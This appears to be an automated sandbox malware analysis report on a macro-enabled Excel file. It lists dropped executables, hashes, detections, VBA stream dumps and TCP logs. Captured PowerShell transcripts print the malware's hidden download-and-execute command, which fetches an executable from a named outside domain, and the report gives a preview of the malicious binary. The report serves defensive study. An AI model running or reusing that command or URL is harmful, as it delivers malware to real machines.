                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):22
                                                                                                                                        Entropy (8bit):2.9808259362290785
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                        MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                        SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                        SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                        SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                                                                                                                        Process:C:\Users\Public\kzsuoseu.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):518656
                                                                                                                                        Entropy (8bit):7.09167824863409
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:KIZ3fgZbssXFtV1lZ09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxxxxxU:KIhgdssXFt9ZIFqy
                                                                                                                                        MD5:B7679C443E22238291F5603F016FF56E
                                                                                                                                        SHA1:8E17BEE5C61B8383A3AD6F16701A204A62F6D05A
                                                                                                                                        SHA-256:BE48A66B718F94C2379453FF845E0047504573E3C0E1A9F7AB3011DAB1C06B57
                                                                                                                                        SHA-512:C9936D1382DFEC2E81E9DC26DD41D877734A89242DB847CC2C7B4CA5448AED0A4596220AB462A9EABA1A3866C23CB6544590AB3DDBF935E249409206B5AD56B3
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.MulDrop15.61981.23282.exe, Detection: malicious, Browse
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+._.....................*........... ........@.. .......................@............@.....................................K........&................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc....&.......(..................@..@.reloc....... ......................@..B........................H........1..x7......o....h...s...........................................0...........(....86...8........E....C...8..._...8>....(.... .....:....&8.....(.... .....9....& ....8.....(....8.....(.... .....:....& ....8....*....0..I.......8*.......E........g...........<.......!...8.... ......8:....(.... ....8....*8\... ....(....9....&8....8.... ....8....s...... ....(....9~...&8t...s...... ....(....9b...&8X.....o......j<!... ....(....9>...&84.....o....8o.........(....r...p...........
                                                                                                                                        C:\Users\user\Documents\20201128\PowerShell_transcript.472847.mNQ4U7A3.20201128120249.txt
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):3940
                                                                                                                                        Entropy (8bit):5.392532715480032
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:BZq/AN97MqDo1ZA8i8XmZX/AN97MqDo1Z1s8X28Xt4Ezy8Xt4Ezy8Xt4EzGZk:58XB8X28Xe8Xe8XX
                                                                                                                                        MD5:0FB120C829BCD27A6BAD0D24C39F2C9C
                                                                                                                                        SHA1:16589189DA80041A76112CB923DC9F12B4911B83
                                                                                                                                        SHA-256:C89ACA82B6CC9985F88A24B9C205F7597C29E677F433F41A0F6C9F9E1FB4DF7D
                                                                                                                                        SHA-512:DF6E29F0D314357D1853CA792B92CFCA21FD9E0DFF4897A44D42FF69053D4C47779C6E7EF708648D9AED8B5E12372324EC514AC7BB23356E97AA7EF167B2E0C0
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20201128120250..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 472847 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath C:\Users\Public\kzsuoseu.exe}..Process ID: 5152..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201128120250..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath C:\Users\Public\kzsuoseu.exe}..**
                                                                                                                                        C:\Users\user\Documents\20201128\PowerShell_transcript.472847.zoRxbWTq.20201128120249.txt
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1211
                                                                                                                                        Entropy (8bit):5.255722723468591
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:BxSAQ5DvBBAx2DOXiRbWoY8a8sW2HjeTKKjX4CIym1ZJXcpaY8a8hnxSAZS:BZQRv/AoOqioYL832qDYB1ZOUYL8VZZS
                                                                                                                                        MD5:62CABA494FCFF31EB14193C2704AEB2F
                                                                                                                                        SHA1:D920FBD1A9803DD57EFB4F601D3C96E2505F39DE
                                                                                                                                        SHA-256:226233792062118037B36CAAFAF26A56167C0DB969A133007F903677C8A6D64C
                                                                                                                                        SHA-512:1698AA9616337B142D0D7B72D6403927281F41561CB3856F01E5FC9D1EDDCA45987401D7F0302FD71510064E3B97FE389AA7ABBFC4C2BB479CE85D5915BB860D
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20201128120249..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 472847 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath C:\Users\Public\kzsuoseu.exe}..Process ID: 5140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201128120249..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath C:\Users\Public\kzsuoseu.exe}..**

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dell, Last Saved By: Dell, Create Time/Date: Thu Nov 26 22:26:29 2020, Last Saved Time/Date: Thu Nov 26 22:26:29 2020, Security: 0
                                                                                                                                        Entropy (8bit):7.862116609513471
                                                                                                                                        TrID:
                                                                                                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                        File name:x2hGv.xls
                                                                                                                                        File size:208384
                                                                                                                                        MD5:9e7c47bf75405a4007da5989a93e14ae
                                                                                                                                        SHA1:6f52910e199f61d3c4a6d165266322aa7e40beea
                                                                                                                                        SHA256:7937e499e1d7ddb1cf32b451e5745a70a1878fa658958cd64b1ff46142608bba
                                                                                                                                        SHA512:4cdc8bc04a5352adf78466d379c85fa7cb3f87aef78815f45b6d6483edd4194c30d02a6020e8982ab1eec0de1b99c3b0c71da10bd6bbbc80006923dafc7a4398
                                                                                                                                        SSDEEP:6144:Vk3hOdsylKlgryzc4bNhZF+E+W2knz17K4g62FpqDIWPIVirJNl15bdVwHmGRl:I1+4v2FpqDAcrJN1bbwGGR
                                                                                                                                        File Content Preview:........................>.......................................................b.......d......................................................................................................................................................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                        Static OLE Info

                                                                                                                                        General

                                                                                                                                        Document Type:OLE
                                                                                                                                        Number of OLE Files:1

                                                                                                                                        OLE File "x2hGv.xls"

                                                                                                                                        Indicators

                                                                                                                                        Has Summary Info:True
                                                                                                                                        Application Name:unknown
                                                                                                                                        Encrypted Document:False
                                                                                                                                        Contains Word Document Stream:False
                                                                                                                                        Contains Workbook/Book Stream:True
                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                        Flash Objects Count:
                                                                                                                                        Contains VBA Macros:True

                                                                                                                                        Summary

                                                                                                                                        Code Page:1252
                                                                                                                                        Author:Dell
                                                                                                                                        Last Saved By:Dell
                                                                                                                                        Create Time:2020-11-26 22:26:29
                                                                                                                                        Last Saved Time:2020-11-26 22:26:29
                                                                                                                                        Security:0

                                                                                                                                        Document Summary

                                                                                                                                        Document Code Page:1252
                                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                                        Contains Dirty Links:False
                                                                                                                                        Shared Document:False
                                                                                                                                        Changed Hyperlinks:False
                                                                                                                                        Application Version:983040

                                                                                                                                        Streams with VBA

                                                                                                                                        VBA File Name: ThisWorkbook.cls, Stream Size: 741
                                                                                                                                        General
                                                                                                                                        Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                        VBA File Name:ThisWorkbook.cls
                                                                                                                                        Stream Size:741
                                                                                                                                        Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " T h i . s W o r k b o o . k " . . . . B a s . . . 0 { 0 0 0 2 0 P 8 1 9 - . . 0 . . C # . . . . 4 6 } . | G l . o b a l . . S p a . c . . F a l s e . % . C r e a t a b l . . . P r e d e c l . a . . I d . # T r u . . " E x p o s e . . . . @ T e m p l a t @ e D e r i v . . C . u s t o m i z . D . . 2 P . . . . S u b . . . _ B e f o r . e C l . 9 ( C a n . c e l A s B . o o l e a n ) . . . R a n g e ( " . l 1 : x 2 2 " ) . . S e l e c t . . . . . i
                                                                                                                                        Data Raw:01 e1 b2 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 57 6f 72 6b 62 6f 6f 10 6b 22 0d 0a 0a 8c 42 61 73 01 02 8c 30 7b 30 30 30 32 30 50 38 31 39 2d 00 10 30 03 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d0 53 70 61 82 63 01 92 46 61 6c 73 65 0c 25 00 43 72 65 61 74 61 62 6c 01 15 1f 50 72 65 64 65 63 6c 12 61 00 06 49 64

                                                                                                                                        VBA Code Keywords

                                                                                                                                        Keyword
                                                                                                                                        qddpcgcmvwkusmkzhxaudgogcymdavjkpew
                                                                                                                                        gabitqhtv
                                                                                                                                        fgxdjtyaf
                                                                                                                                        .TintAndShade
                                                                                                                                        VB_Name
                                                                                                                                        VB_Creatable
                                                                                                                                        xlCenter
                                                                                                                                        "ThisWorkbook"
                                                                                                                                        VB_Exposed
                                                                                                                                        .VerticalAlignment
                                                                                                                                        .WrapText
                                                                                                                                        .Orientation
                                                                                                                                        Selection.Borders(xlDiagonalUp).LineStyle
                                                                                                                                        .ShrinkToFit
                                                                                                                                        .MergeCells
                                                                                                                                        xlThin
                                                                                                                                        Workbook_BeforeClose(Cancel
                                                                                                                                        VB_Customizable
                                                                                                                                        .ColorIndex
                                                                                                                                        .AddIndent
                                                                                                                                        Selection.Font.Italic
                                                                                                                                        .Weight
                                                                                                                                        Selection.Font.Bold
                                                                                                                                        gabitqhtv.Create(qddpcgcmvwkusmkzhxaudgogcymdavjkpew)
                                                                                                                                        xlContext
                                                                                                                                        .HorizontalAlignment
                                                                                                                                        xlBottom
                                                                                                                                        .LineStyle
                                                                                                                                        VB_TemplateDerived
                                                                                                                                        xlNone
                                                                                                                                        xlUnderlineStyleSingle
                                                                                                                                        Selection.Borders(xlDiagonalDown).LineStyle
                                                                                                                                        Selection.Borders(xlEdgeTop)
                                                                                                                                        Selection
                                                                                                                                        False
                                                                                                                                        Selection.Borders(xlEdgeLeft)
                                                                                                                                        .IndentLevel
                                                                                                                                        Attribute
                                                                                                                                        Selection.Font.Underline
                                                                                                                                        Private
                                                                                                                                        .ReadingOrder
                                                                                                                                        xlContinuous
                                                                                                                                        VB_PredeclaredId
                                                                                                                                        VB_GlobalNameSpace
                                                                                                                                        VB_Base
                                                                                                                                        Boolean)
                                                                                                                                        VBA Code
                                                                                                                                        VBA File Name: cgambwxlv.cls, Stream Size: 172
                                                                                                                                        General
                                                                                                                                        Stream Path:_VBA_PROJECT_CUR/VBA/cgambwxlv
                                                                                                                                        VBA File Name:cgambwxlv.cls
                                                                                                                                        Stream Size:172
                                                                                                                                        Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " c g a . m b w x l v " . " . . . B a s . . 0 { . 0 0 0 2 0 8 2 0 6 - . . . . C . . . . 4 6 . } . | G l o b a l ! . . S p a c . . F a . l s e . % C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . . @ T e m . p l a t e D e r . i v . . C u s t o . m i z . D . 2
                                                                                                                                        Data Raw:01 a8 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 63 67 61 00 6d 62 77 78 6c 76 22 0d 22 0a 0a 80 42 61 73 02 80 30 7b 00 30 30 30 32 30 38 32 30 36 2d 00 10 04 08 43 05 12 03 00 34 36 02 7d 0d 7c 47 6c 6f 62 61 6c 21 01 ca 53 70 61 63 01 92 46 61 08 6c 73 65 0c 25 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72

                                                                                                                                        VBA Code Keywords

                                                                                                                                        Keyword
                                                                                                                                        False
                                                                                                                                        VB_Exposed
                                                                                                                                        Attribute
                                                                                                                                        "cgambwxlv"
                                                                                                                                        VB_Name
                                                                                                                                        VB_Creatable
                                                                                                                                        VB_PredeclaredId
                                                                                                                                        VB_GlobalNameSpace
                                                                                                                                        VB_Base
                                                                                                                                        VB_Customizable
                                                                                                                                        VB_TemplateDerived
                                                                                                                                        VBA Code

                                                                                                                                        Streams

                                                                                                                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                                                                                                                        General
                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                        File Type:data
                                                                                                                                        Stream Size:107
                                                                                                                                        Entropy:4.18482950044
                                                                                                                                        Base64 Encoded:True
                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 228
                                                                                                                                        General
                                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                                        File Type:data
                                                                                                                                        Stream Size:228
                                                                                                                                        Entropy:2.84703244825
                                                                                                                                        Base64 Encoded:False
                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . c g a m b w x l v . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8e 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 176
                                                                                                                                        General
                                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                                        File Type:data
                                                                                                                                        Stream Size:176
                                                                                                                                        Entropy:3.04446644157
                                                                                                                                        Base64 Encoded:False
                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . P . . . . . . . ` . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . D e l l . . . . . . . . . . . . D e l l . . . . @ . . . . . U / C . . . @ . . . . . U / C . . . . . . . . . . .
                                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 80 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 04 00 00 00 40 00 00 00 08 00 00 00 50 00 00 00 0c 00 00 00 60 00 00 00 0d 00 00 00 6c 00 00 00 13 00 00 00 78 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 44 65 6c 6c 00 00 00 00
                                                                                                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 200634
                                                                                                                                        General
                                                                                                                                        Stream Path:Workbook
                                                                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                        Stream Size:200634
                                                                                                                                        Entropy:7.92744569275
                                                                                                                                        Base64 Encoded:True
                                                                                                                                        Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e l l B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P K . 8 . . . . . . . X . @
                                                                                                                                        Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 44 65 6c 6c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                        Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 486
                                                                                                                                        General
                                                                                                                                        Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Stream Size:486
                                                                                                                                        Entropy:5.16593610426
                                                                                                                                        Base64 Encoded:True
                                                                                                                                        Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = c g a m b w x l v / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = 0 . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 6 9 4 3 A D 6 4 6 F A D 8 F E D 8 F E D C 0 2 D C 0 2 " . . D P B = " A B A 9 0 7 F E A F 1 B A F 1 B 5 0 E 5 B 0 1 B 4 9 8 5 6 9 F 6 7 0 0 2
                                                                                                                                        Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 63 67 61 6d 62 77 78 6c 76 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d
                                                                                                                                        Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 71
                                                                                                                                        General
                                                                                                                                        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                        File Type:data
                                                                                                                                        Stream Size:71
                                                                                                                                        Entropy:3.3273355158
                                                                                                                                        Base64 Encoded:False
                                                                                                                                        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . c g a m b w x l v . c . g . a . m . b . w . x . l . v . . . . .
                                                                                                                                        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 63 67 61 6d 62 77 78 6c 76 00 63 00 67 00 61 00 6d 00 62 00 77 00 78 00 6c 00 76 00 00 00 00 00
                                                                                                                                        Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                                                                                                                        General
                                                                                                                                        Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                        File Type:ISO-8859 text, with no line terminators
                                                                                                                                        Stream Size:7
                                                                                                                                        Entropy:1.84237099318
                                                                                                                                        Base64 Encoded:False
                                                                                                                                        Data ASCII:. a . . . . .
                                                                                                                                        Data Raw:cc 61 ff ff 00 00 00
                                                                                                                                        Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 225
                                                                                                                                        General
                                                                                                                                        Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                        File Type:data
                                                                                                                                        Stream Size:225
                                                                                                                                        Entropy:5.59631173362
                                                                                                                                        Base64 Encoded:False
                                                                                                                                        Data ASCII:. . . . . . . . . . . . 0 . . . . . . . . H . . . . . . . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . Q . T . . . " < . . . . . . D . . . . . . . . . T . h i s W o r k b @ o o k G . . . . . . h . i . s . W . . o . r . k . b . . . o . . . . / 2 . / . . u . H . . 1 . . . . . , . C * " . . + . . . . ^ . . . c g a m b w x l . v G . . . . . g . . a . m . , w . x . . l . v . E . . 2 . . . @ . . . .
                                                                                                                                        Data Raw:01 dd b0 80 01 00 04 00 00 00 01 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 00 08 05 06 12 09 02 12 a5 95 1f 51 06 54 00 0c 02 22 3c 02 0a 0f 02 b6 02 44 00 13 02 07 ff ff 19 02 1d 54 00 68 69 73 57 6f 72 6b 62 40 6f 6f 6b 47 00 18 01 11 00 00 68 00 69 00 73

                                                                                                                                        Network Behavior

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Nov 28, 2020 12:02:52.444843054 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:52.562726021 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:52.564017057 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:52.572856903 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:52.690720081 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.253201962 CET4973880192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.370846987 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.371071100 CET4973880192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.373191118 CET4973880192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.490751982 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579556942 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579597950 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579613924 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579627991 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579642057 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579662085 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579680920 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579699993 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579722881 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579770088 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.579864025 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.579958916 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.697747946 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.697773933 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.697792053 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.697813988 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.697833061 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.697865009 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.697881937 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.697902918 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.697921038 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.697982073 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.698077917 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.698097944 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.698113918 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.698129892 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.698164940 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.698199987 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.698249102 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.698323011 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.698368073 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.699045897 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.699065924 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.699079990 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.699093103 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.699187040 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.699255943 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.699263096 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.699318886 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.809741974 CET8049738162.223.88.131192.168.2.5
